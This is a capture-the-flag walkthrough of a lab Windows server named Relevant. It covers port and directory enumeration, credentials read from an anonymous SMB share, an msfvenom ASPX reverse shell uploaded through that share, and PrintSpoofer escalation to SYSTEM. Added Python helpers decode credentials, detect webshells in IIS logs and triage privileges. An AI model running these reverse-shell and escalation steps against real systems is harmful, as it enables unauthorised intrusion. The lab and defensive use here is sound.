
Relevant Walkthrough

$ nmap -p1-65535 10.10.2.212 -T5
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-09 00:48 IST
Initiating Ping Scan at 00:48
Scanning 10.10.2.212 [2 ports]
Completed Ping Scan at 00:48, 0.37s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 00:48
Completed Parallel DNS resolution of 1 host. at 00:48, 6.54s elapsed
DNS resolution of 1 IPs took 6.54s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating Connect Scan at 00:48
Scanning 10.10.2.212 [8 ports]
Discovered open port 445/tcp on 10.10.2.212
Discovered open port 49663/tcp on 10.10.2.212
Discovered open port 49667/tcp on 10.10.2.212
Discovered open port 49669/tcp on 10.10.2.212
Discovered open port 80/tcp on 10.10.2.212
Discovered open port 3389/tcp on 10.10.2.212
Discovered open port 135/tcp on 10.10.2.212
Discovered open port 139/tcp on 10.10.2.212
Completed Connect Scan at 00:48, 0.36s elapsed (8 total ports)
Nmap scan report for 10.10.2.212
Host is up, received syn-ack (0.36s latency).
Scanned at 2021-07-09 00:48:25 IST for 7s

PORT      STATE SERVICE       REASON
80/tcp    open  http          syn-ack
135/tcp   open  msrpc         syn-ack
139/tcp   open  netbios-ssn   syn-ack
445/tcp   open  microsoft-ds  syn-ack
3389/tcp  open  ms-wbt-server syn-ack
49663/tcp open  unknown       syn-ack
49667/tcp open  unknown       syn-ack
49669/tcp open  unknown       syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 7.37 seconds
$ nmap -sV -sC -p80,135,139,445,3389,49667,49669,49663 10.10.2.212
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-09 00:50 IST
Nmap scan report for 10.10.2.212
Host is up (0.36s latency).

PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: RELEVANT
|   NetBIOS_Domain_Name: RELEVANT
|   NetBIOS_Computer_Name: RELEVANT
|   DNS_Domain_Name: Relevant
|   DNS_Computer_Name: Relevant
|   Product_Version: 10.0.14393
|_  System_Time: 2021-07-08T19:21:29+00:00
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2021-07-07T18:52:30
|_Not valid after:  2022-01-06T18:52:30
|_ssl-date: 2021-07-08T19:22:09+00:00; -1s from scanner time.
49663/tcp open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h23m59s, deviation: 3h07m52s, median: -1s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
|   Computer name: Relevant
|   NetBIOS computer name: RELEVANT\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-07-08T12:21:32-07:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-07-08T19:21:29
|_  start_date: 2021-07-08T18:52:56

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 110.54 seconds

80/tcp    open  http          Microsoft IIS httpd 10.0
49663/tcp open  http          Microsoft IIS httpd 10.0

Enumerating port 80

[Screenshot: default IIS page on port 80]

Nothing of interest on the default IIS page.

Let's fuzz it.

$ ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ  -u http://10.10.2.212/FUZZ -e .php,.asp,.aspx,.html,.txt -ic -t 250

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.2.212/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Extensions       : .php .asp .aspx .html .txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 250
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

                        [Status: 200, Size: 703, Words: 27, Lines: 32]
:: Progress: [1323282/1323282] :: Job [1/1] :: 175 req/sec :: Duration: [0:08:25] :: Errors: 0 ::

Nothing else is exposed on port 80: the only hit is the root page itself (703 bytes).

Enumerating port 49663

[Screenshot: default IIS page on port 49663]

Again nothing on the default page.

Let's fuzz it.


$ ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ  -u http://10.10.2.212:49663/FUZZ -e .html,.asp,.aspx,.php,.txt -ic -t 250

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.2.212:49663/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Extensions       : .html .asp .aspx .php .txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 250
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

                        [Status: 200, Size: 703, Words: 27, Lines: 32]
nt4wrksv                [Status: 301, Size: 157, Words: 9, Lines: 2]
:: Progress: [1323282/1323282] :: Job [1/1] :: 106 req/sec :: Duration: [0:06:20] :: Errors: 0 ::

Fuzzing found a directory, nt4wrksv (the 301 is IIS redirecting to the trailing-slash form of the path).

Let's check what's inside nt4wrksv.

$ ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ  -u http://10.10.2.212:49663/nt4wrksv/FUZZ -e .html,.asp,.aspx,.php,.txt -ic -t 250

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.2.212:49663/nt4wrksv/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Extensions       : .html .asp .aspx .php .txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 250
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

                        [Status: 200, Size: 0, Words: 1, Lines: 1]
passwords.txt           [Status: 200, Size: 98, Words: 4, Lines: 3]
Passwords.txt           [Status: 200, Size: 98, Words: 4, Lines: 3]
:: Progress: [1323282/1323282] :: Job [1/1] :: 205 req/sec :: Duration: [0:10:30] :: Errors: 0 ::

Navigating to passwords.txt (the Passwords.txt hit is the same file: IIS on NTFS matches paths case-insensitively, so hits that differ only in case should be deduplicated).

[Screenshot: contents of passwords.txt]

139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Windows Server 2016 Standard Evaluation 14393 microsoft-ds

Enumerating SMB

Listing SMB shares as the anonymous user (blank password)

$ smbclient -L  \\\\10.10.2.212\\ -U anonymous
Enter WORKGROUP\anonymous's password:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        nt4wrksv        Disk
SMB1 disabled -- no workgroup available

The share list includes nt4wrksv, the same name as the directory found on the web server on port 49663.

Let's check the share contents.

$ smbclient \\\\10.10.2.212\\nt4wrksv -U anonymous
Enter WORKGROUP\anonymous's password:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sun Jul 26 03:16:04 2020
  ..                                  D        0  Sun Jul 26 03:16:04 2020
  passwords.txt                       A       98  Sat Jul 25 20:45:33 2020

                7735807 blocks of size 4096. 4933716 blocks available
smb: \> get passwords.txt
getting file \passwords.txt of size 98 as passwords.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \>
$ cat passwords.txt
[User Passwords - Encoded]

$ echo "<encoded line>" | base64 -d

The entries in the file are base64-encoded, not hashed, so each line decodes directly to a username and password. The same passwords.txt (same size, 98 bytes) is served over HTTP and over SMB, so the SMB share and the web directory are backed by the same folder on disk.
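The decode step above is one `base64 -d` per entry. For a file with several entries, or a copy-paste that picked up stray characters, it helps to validate the decoding instead of trusting whatever falls out. The following Python is an added example, not from the original walkthrough: the sample file and its credentials are constructed (fake), and the `user - password` / `user:password` separators are an assumption about the decoded format.

```python
"""Decode a "[User Passwords - Encoded]" style file such as the one pulled from
the nt4wrksv share.

Added example, not part of the original write-up. SAMPLE_FILE is constructed
with fake credentials; SEPARATORS is an assumption about the decoded format.
"""
import base64
import binascii
from typing import List, Optional, Tuple

# Assumption: decoded lines join user and password with one of these.
SEPARATORS = (" - ", ":")


def decode_entry(token: str) -> Optional[str]:
    """Strictly base64-decode one line; return None if it is not base64 text.

    validate=True rejects non-alphabet characters instead of silently dropping
    them, which is what a plain `base64 -d` does with a mangled copy-paste.
    """
    token = token.strip()
    if not token:
        return None
    try:
        text = base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None
    return text if text.isprintable() else None


def split_credential(line: str) -> Tuple[str, str]:
    """Split a decoded line into (user, password) on the first known separator."""
    for sep in SEPARATORS:
        if sep in line:
            user, password = line.split(sep, 1)
            return user.strip(), password.strip()
    return line, ""          # no separator: keep the whole line as the user field


def parse_password_file(content: str) -> List[Tuple[str, str]]:
    """Skip [bracketed] section headers, decode each remaining line, and return
    the credentials. Lines that fail to decode are skipped so one bad entry does
    not hide the rest."""
    creds = []
    for line in content.splitlines():
        line = line.strip()
        if not line or (line.startswith("[") and line.endswith("]")):
            continue
        decoded = decode_entry(line)
        if decoded is not None:
            creds.append(split_credential(decoded))
    return creds


# Constructed sample (fake credentials, not the real file): two valid entries
# and one line that is not base64 at all.
SAMPLE_FILE = """[User Passwords - Encoded]
YWxpY2UgLSBQYXNzMTIz
Ym9iOmh1bnRlcjI=
this is not base64
"""

if __name__ == "__main__":
    for user, password in parse_password_file(SAMPLE_FILE):
        print(f"{user}: {password}")
```

Run it on the real file with `parse_password_file(open("passwords.txt").read())`; anything that is silently missing from the output failed strict decoding and is worth a second look by hand.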

Let's try to log in with the credentials we obtained, first with psexec.

$ impacket-psexec <user1>@10.10.2.212
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[*] Requesting shares on 10.10.2.212.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[*] Found writable share nt4wrksv
[*] Uploading file EanxqaXl.exe
[*] Opening SVCManager on 10.10.2.212.....
[-] Error opening SVCManager on 10.10.2.212.....
[-] Error performing the installation, cleaning up: Unable to open SVCManager

$ impacket-psexec <user2>@10.10.2.212
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[-] Authenticated as Guest. Aborting
$ impacket-smbexec <username>@10.10.2.212
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied

Neither account gives us execution this way. The first one can write to nt4wrksv (psexec uploads its service binary there without complaint) but cannot open the Service Control Manager, so it is not a local administrator. The second is mapped to Guest, which means the server did not accept that password and fell back to guest access. smbexec also needs the Service Control Manager and is denied as well.

3389/tcp open ms-wbt-server Microsoft Terminal Services

Nothing useful from RDP beyond what nmap's rdp-ntlm-info already showed (hostname RELEVANT, build 10.0.14393, workgroup machine rather than domain-joined).

135/tcp   open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC

Enumerating RPC

$ impacket-rpcdump -p 135 10.10.2.212
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Retrieving endpoint list from 10.10.2.212
Protocol: [MS-RSP]: Remote Shutdown Protocol
Provider: wininit.exe
UUID    : D95AFE70-A6D5-4259-822E-2C84DA1DDB0D v1.0
Bindings:
          ncacn_ip_tcp:10.10.212.183[49664]
          ncalrpc:[WindowsShutdown]
          ncacn_np:\\RELEVANT[\PIPE\InitShutdown]
          ncalrpc:[WMsgKRpc056B40]

Protocol: N/A
Provider: winlogon.exe
UUID    : 76F226C3-EC14-4325-8A99-6A46348418AF v1.0
Bindings:
          ncalrpc:[WindowsShutdown]
          ncacn_np:\\RELEVANT[\PIPE\InitShutdown]
          ncalrpc:[WMsgKRpc056B40]
          ncalrpc:[WMsgKRpc056F61]

Protocol: N/A
Provider: N/A
UUID    : 9B008953-F195-4BF9-BDE0-4471971E58ED v1.0
Bindings:
          ncalrpc:[LRPC-1be762d5015219c5a3]
          ncalrpc:[dabrpc]
          ncalrpc:[csebpub]
          ncalrpc:[LRPC-c203dfa22bac15b3c5]
          ncalrpc:[LRPC-b82439b7ffcc5fe731]
          ncalrpc:[LRPC-9efce308fe57bc6b90]
          ncalrpc:[OLE6137AF4DDCF580E592E6DFEF2038]
          ncacn_np:\\RELEVANT[\pipe\LSM_API_service]
          ncalrpc:[LSMApi]
          ncalrpc:[LRPC-c0a61cdf71ff711a8d]
          ncalrpc:[actkernel]
          ncalrpc:[umpo]

Protocol: N/A
Provider: N/A
UUID    : D09BDEB5-6171-4A34-BFE2-06FA82652568 v1.0
Bindings:
          ncalrpc:[csebpub]
          ncalrpc:[LRPC-c203dfa22bac15b3c5]
          ncalrpc:[LRPC-b82439b7ffcc5fe731]
          ncalrpc:[LRPC-9efce308fe57bc6b90]
          ncalrpc:[OLE6137AF4DDCF580E592E6DFEF2038]
          ncacn_np:\\RELEVANT[\pipe\LSM_API_service]
          ncalrpc:[LSMApi]
          ncalrpc:[LRPC-c0a61cdf71ff711a8d]
          ncalrpc:[actkernel]
          ncalrpc:[umpo]
          ncalrpc:[LRPC-b82439b7ffcc5fe731]
          ncalrpc:[LRPC-9efce308fe57bc6b90]
          ncalrpc:[OLE6137AF4DDCF580E592E6DFEF2038]
          ncacn_np:\\RELEVANT[\pipe\LSM_API_service]
          ncalrpc:[LSMApi]
          ncalrpc:[LRPC-c0a61cdf71ff711a8d]
          ncalrpc:[actkernel]
          ncalrpc:[umpo]
          ncalrpc:[LRPC-a1ffce8405a84ea78c]
          ncalrpc:[dhcpcsvc]
          ncalrpc:[dhcpcsvc6]
          ncacn_ip_tcp:10.10.212.183[49666]
          ncacn_np:\\RELEVANT[\pipe\eventlog]
          ncalrpc:[eventlog]
          ncalrpc:[LRPC-182ae2af32da286b69]
          ncalrpc:[LRPC-9bb267989261789578]
[...snip...]
$ impacket-dcomexec -object MMC20 <username>@10.10.2.212
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[*] SMBv3.0 dialect used
[-] rpc_s_access_denied

From enumeration we know that the SMB share nt4wrksv and the web directory /nt4wrksv/ on port 49663 are the same folder, that the share is writable by the anonymous user, and that IIS serves files from it.

Let's create an ASPX reverse shell, upload it through the share, and trigger it by requesting it from the web server (with a listener waiting on port 9898).

$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=9898 --platform windows -a x64 -f aspx -o shell.aspx
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of aspx file: 3428 bytes
Saved as: shell.aspx

$ smbclient \\\\10.10.2.212\\nt4wrksv -U anonymous
Enter WORKGROUP\anonymous's password:
Try "help" to get a list of possible commands.
smb: \> put shell.aspx
putting file shell.aspx as \shell.aspx (6.6 kb/s) (average 6.6 kb/s)
smb: \> exit

Getting the shell

[Screenshot: reverse shell received on port 9898 after requesting shell.aspx]
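For the defender's side of this step, here is an added example in Python (not from the original walkthrough) that hunts IIS W3C logs for exactly this pattern: a script file executed from a directory that is also an SMB-writable share. The log lines, the 10.9.1.5 client address and the WRITABLE_WEB_DIRS mapping are constructed assumptions; the field order is the default IIS W3C set.

```python
"""Hunt IIS W3C logs for a script executed from a directory that is also an
SMB-writable share (the nt4wrksv pattern from this walkthrough).

Added example, not part of the original write-up. SAMPLE_LOG, the client
address 10.9.1.5 and the WRITABLE_WEB_DIRS mapping are constructed assumptions.
"""
from dataclasses import dataclass
from typing import Dict, Iterable, List

# Extensions IIS hands to a script engine under its default handler mappings
# (assumption: an admin may have added or removed mappings on a real host).
SCRIPT_EXTENSIONS = (".asp", ".aspx", ".ashx", ".asmx", ".svc", ".cshtml", ".php")

# Virtual directories backed by a share that untrusted users can write to.
WRITABLE_WEB_DIRS = ("/nt4wrksv/",)


@dataclass(frozen=True)
class Hit:
    when: str
    client: str
    method: str
    path: str
    status: int
    reason: str


def parse_w3c(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Parse IIS W3C lines into dicts keyed by the names in the #Fields header."""
    fields: List[str] = []
    rows: List[Dict[str, str]] = []
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # field order is declared per log file
            continue
        if line.startswith("#"):           # #Software, #Version, #Date
            continue
        if not fields:
            raise ValueError("data row before #Fields header")
        parts = line.split()               # IIS never emits spaces inside a field
        if len(parts) != len(fields):
            continue                       # truncated or corrupt row: skip it
        rows.append(dict(zip(fields, parts)))
    return rows


def find_webshell_hits(lines: Iterable[str]) -> List[Hit]:
    """Flag requests for script files inside a writable share directory.

    200 means IIS found the file and ran it. Other statuses for a script path in
    that directory are reported too: an attacker typically probes the URL before
    and after dropping the file.
    """
    hits: List[Hit] = []
    for row in parse_w3c(lines):
        path = row.get("cs-uri-stem", "")
        lower = path.lower()               # NTFS/IIS paths are case-insensitive
        if not lower.startswith(WRITABLE_WEB_DIRS):
            continue
        if not lower.endswith(SCRIPT_EXTENSIONS):
            continue
        status_text = row.get("sc-status", "")
        status = int(status_text) if status_text.isdigit() else 0
        if status == 200:
            reason = "script executed from SMB-writable directory"
        else:
            reason = f"script probe in SMB-writable directory (status {status_text or '?'})"
        hits.append(Hit(
            when=f"{row.get('date', '?')} {row.get('time', '?')}",
            client=row.get("c-ip", "?"),
            method=row.get("cs-method", "?"),
            path=path,
            status=status,
            reason=reason,
        ))
    return hits


# Constructed sample log (not from the original page): a normal page hit, the
# world-readable passwords.txt being fetched, then shell.aspx probed and run.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2021-07-08 19:30:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2021-07-08 19:30:01 10.10.2.212 GET / - 49663 - 10.9.1.5 Mozilla/5.0 - 200 0 0 15
2021-07-08 19:30:05 10.10.2.212 GET /nt4wrksv/passwords.txt - 49663 - 10.9.1.5 Mozilla/5.0 - 200 0 0 3
2021-07-08 19:31:10 10.10.2.212 GET /nt4wrksv/shell.aspx - 49663 - 10.9.1.5 curl/7.74.0 - 404 0 2 1
2021-07-08 19:31:40 10.10.2.212 GET /nt4wrksv/shell.aspx - 49663 - 10.9.1.5 curl/7.74.0 - 200 0 0 1203
"""

if __name__ == "__main__":
    for h in find_webshell_hits(SAMPLE_LOG.splitlines()):
        print(f"{h.when} {h.client} {h.method} {h.path} -> {h.status}: {h.reason}")
```

Point it at `C:\inetpub\logs\LogFiles\W3SVC<site id>\*.log`. The 404 followed by a 200 for the same .aspx path is the tell: the file did not exist, then it did, and IIS ran it. The root-cause fix is not to map an anonymously writable share into a web root with script execution enabled at all; failing that, a web.config in that directory that removes the script handlers limits the damage to file disclosure.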

Checking systeminfo

[Screenshot: systeminfo output]

Obtaining the user flag

[Screenshot: user.txt]


Checking privileges

[Screenshot: whoami /priv output]

The token holds SeImpersonatePrivilege, which is enough to escalate to SYSTEM.

On older builds the potato family of attacks (Rotten/Juicy Potato) turns SeImpersonatePrivilege into a SYSTEM shell.

On this Windows Server 2016 host we use PrintSpoofer, which abuses the Print Spooler service to obtain a SYSTEM token through the same privilege.
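Before reaching for an escalation tool it is worth triaging the whole privilege list rather than eyeballing it. The following Python helper is an added example, not part of the original walkthrough: it parses `whoami /priv` output (the sample below is constructed to resemble an IIS application-pool token) and reports every privilege that is a known escalation primitive, including ones shown as Disabled, since a privilege that is held but disabled can be re-enabled by the process itself.

```python
"""Triage `whoami /priv` output for privileges that commonly lead to SYSTEM.

Added example, not part of the original write-up. SAMPLE is constructed to
resemble the token of an IIS application pool like the one in the walkthrough.
"""
from typing import Dict, List, Tuple

# Privileges that are well-known local privilege escalation primitives and the
# class of technique each enables. The names are the real Windows constants.
ESCALATION_PRIVS: Dict[str, str] = {
    "SeImpersonatePrivilege": "token impersonation (PrintSpoofer, potato family)",
    "SeAssignPrimaryTokenPrivilege": "token impersonation (potato family)",
    "SeBackupPrivilege": "read any file, e.g. the SAM and SYSTEM hives",
    "SeRestorePrivilege": "write any file, e.g. replace a service binary",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeDebugPrivilege": "open and inject into SYSTEM processes",
    "SeLoadDriverPrivilege": "load a kernel driver",
    "SeManageVolumePrivilege": "raw volume access",
}


def parse_whoami_priv(text: str) -> Dict[str, str]:
    """Return {privilege name: state} from `whoami /priv` output.

    Rows look like `SeImpersonatePrivilege  Impersonate a client ...  Enabled`.
    The description contains spaces, so take the first and last whitespace-
    separated tokens and ignore everything in between.
    """
    privs: Dict[str, str] = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 2 or not parts[0].startswith("Se"):
            continue                       # header, separator or blank line
        privs[parts[0]] = parts[-1]
    return privs


def triage(text: str) -> List[Tuple[str, str, str]]:
    """List (privilege, state, why it matters) for every escalation primitive held.

    A privilege shown as Disabled is still present in the token: the process can
    turn it on with AdjustTokenPrivileges, so it is reported as well.
    """
    found: List[Tuple[str, str, str]] = []
    for name, state in parse_whoami_priv(text).items():
        if name in ESCALATION_PRIVS:
            found.append((name, state, ESCALATION_PRIVS[name]))
    return found


# Constructed sample, not the real screenshot from the page.
SAMPLE = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

if __name__ == "__main__":
    for name, state, why in triage(SAMPLE):
        print(f"{name:32} {state:9} {why}")
```

Paste the output of `whoami /priv` from the shell into `triage()`; with the sample above it reports both SeAssignPrimaryTokenPrivilege (Disabled, but held) and SeImpersonatePrivilege (Enabled), which is the combination that makes the impersonation route the obvious choice on this host.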

Running the PrintSpoofer payload

[Screenshot: whoami after PrintSpoofer, now NT AUTHORITY\SYSTEM]

Getting the root flag

[Screenshot: root.txt]

Clean up

[Screenshots: clean-up of the uploaded files (three images)]